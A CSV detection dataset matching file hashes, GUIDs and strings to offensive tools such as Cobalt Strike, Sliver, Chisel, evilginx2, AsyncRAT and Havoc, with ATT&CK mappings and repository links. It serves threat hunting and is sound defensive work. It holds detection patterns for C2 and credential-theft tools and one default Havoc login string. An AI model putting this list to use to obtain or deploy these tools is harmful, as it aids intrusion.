"*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1*",".{0,1000}5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b*",".{0,1000}5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440*",".{0,1000}5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac*",".{0,1000}5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*",".{0,1000}5F4DC47F\-7819\-4528\-9C16\-C88F1BE97EC5.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0*",".{0,1000}5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1*",".{0,1000}5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47*",".{0,1000}5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5FAC3991-D4FD-4227-B73D-BEE34EB89987*",".{0,1000}5FAC3991\-D4FD\-4227\-B73D\-BEE34EB89987.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F*",".{0,1000}5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042*",".{0,1000}5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101*",".{0,1000}5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7*",".{0,1000}5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa*",".{0,1000}5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d*",".{0,1000}5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09*",".{0,1000}5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5spider:password1234*",".{0,1000}5spider\:password1234.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0*",".{0,1000}600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a*",".{0,1000}602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0*",".{0,1000}602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4*",".{0,1000}605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812*",".{0,1000}605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb*",".{0,1000}608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*60C1DA68-85AC-43AB-9A2B-27FA345EC113*",".{0,1000}60C1DA68\-85AC\-43AB\-9A2B\-27FA345EC113.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646*",".{0,1000}60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b*",".{0,1000}60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e*",".{0,1000}60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*61254294a879235560c1bcf796ff256bc48d2d90*",".{0,1000}61254294a879235560c1bcf796ff256bc48d2d90.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc*",".{0,1000}612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7*",".{0,1000}612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3*",".{0,1000}613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619*",".{0,1000}614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66*",".{0,1000}615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d*",".{0,1000}6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e*",".{0,1000}61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277*",".{0,1000}61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*61c0af74e23b91ced41254e8d701482a157464d4*",".{0,1000}61c0af74e23b91ced41254e8d701482a157464d4.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413*",".{0,1000}61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a*",".{0,1000}61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97*",".{0,1000}6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 